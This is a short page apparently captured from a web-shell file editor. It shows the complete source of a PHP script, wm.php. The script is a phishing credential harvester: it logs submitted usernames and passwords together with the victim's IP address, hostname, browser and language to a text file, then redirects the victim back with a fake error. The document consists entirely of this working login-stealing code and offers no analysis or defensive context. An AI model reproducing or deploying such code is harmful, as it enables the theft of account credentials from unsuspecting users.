Edit file File name : wm.php Content :<?php $data .= $_POST['username_hidden'] . "\n"; $data .= $_POST['pass'] . "\n"; $data .= date("F j, Y, g:i a") . "\n"; $data .= $_SERVER['REMOTE_ADDR'] . "\n"; $data .= gethostbyaddr($_SERVER['REMOTE_ADDR']) . "\n"; $data .= $_SERVER['HTTP_USER_AGENT'] . "\n"; $data .= $_SERVER['HTTP_ACCEPT_LANGUAGE'] . "\n"; $data .= "-------------------------------------" . "\n"; $file = "wm.txt"; $fp = fopen($file, "a"); fwrite($fp, $data); $em=$_POST['username_hidden']; header('Location: index.php?correo='.$em.'&errr=errr'); ?>Save